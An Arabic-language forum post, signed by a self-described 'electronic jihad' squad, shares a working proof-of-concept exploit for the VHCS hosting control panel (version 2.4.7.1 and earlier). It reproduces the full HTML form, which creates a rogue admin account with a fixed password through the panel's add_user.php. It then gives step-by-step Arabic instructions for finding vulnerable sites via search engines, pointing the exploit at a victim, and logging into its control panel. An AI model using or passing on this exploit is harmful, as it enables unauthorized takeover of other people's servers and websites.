Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: ثغره سهله Vhcs


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
ثغره سهله Vhcs
Permalink   
 




بسم الله الرحمن الرحيم

اسم الثغره : تغرة Vhcs

ابحث في اى محرك بحث

www.google.com

عن كلمه


كود:vhcs

كود:<html>
<head>
<title>VHCS (version <= 2.4.7.1) PoC. By RoMaNSoFt</title>
<script language="JavaScript">
function submitform()
{
if (document.admin_add_user.username.value=='admin')
{
alert('Learn to read before launching an exploit, script-kiddie!');
exit();
}
document.admin_add_user.action=document.admin_add_ user.target.value;
document.admin_add_user.submit();
}
</script>
</head>
<body>
<hr>
<center>
<b>VHCS (version <= 2.4.7.1) PoC. By RoMaNSoFt &#60roman&#64rs-labs.com&#62 [08.Feb.2006]</b>
</center>
<hr>
<form name="admin_add_user" method="post" action="">
<table width="100%" cellpadding="5" cellspacing="5">
<tr>
<td width="20"> </td>
<td colspan="2">

</td>
</tr>
<tr>
<td width="20"> </td> <td width="200">Target URL</td>
<td>
<input type="text" name="target" value="http://<target>/vhcs2/admin/add_user.php" style="width:400px">
</td>
</tr>
<tr>
<td width="20"> </td> <td width="200">Username</td>
<td>
<input type="text" name="username" value="admin" style="width:200px"> (should NOT exist)
</td>
</tr>
<tr>
<td> </td>
<td colspan="2"><a href="javascript: submitform()">Exploit it!</a></td>
</tr>
<tr>
<td colspan="3">
</td>
</tr>
</table>
<input type="hidden" name="pass" value="dsrrocks">
<input type="hidden" name="pass_rep" value="dsrrocks">
<input type="hidden" name="email" value="vhcs-exploit@rs-labs.com">
<input type="hidden" name="uaction" value="add_user">
</form>
<hr>
<br>
<u>Quick instructions</u>.-<br>
<br>
1.- Enable JavaScript. Fill in the form with appropiate target URL (usually you will only need to replace &#60target&#62 string) and username.<br>
2.- Remember not to use a probably existing username (such as "admin").<br>
3.- Launch the exploit. <i>If target system is vulnerable, a new VHCS admin user will be created</i> <br>
4.- You will be redirected to VHCS login page. Try to login with your brand new username.<br>
5.- Ummm, I forgot it... The password is: <b>dsrrocks</b>.<br>
<br>
<u>More info (analysis, fix, etc)</u>.-<br>
<br>
See <a href=http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt><i>RS-2006-1</i></a>.<br>
<br>
<hr>
</body>
</html>

طبعا نلاحظ الكود بلغه html

اوك نناخد الكود وننسخه واحفظه بامتداد html

وغير كلمه <target>/ لاسم الموقع الى المصاب

وفى خانه Username خير باى اسم تبيه مثلا alsakr

بعد ذالك اضغط على كلمه Exploit it!

تلاحظ انك فى لوحه التحكم ويطلب منك اليوزر والباص

طبعا اليوز الى اعطينا اياه مثلا asbmay

والباص طبعا هوه dsrrocks

تلاحظه مكتوب بلثغره والف مبروك اصبحت فى لوحه التحكم






__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard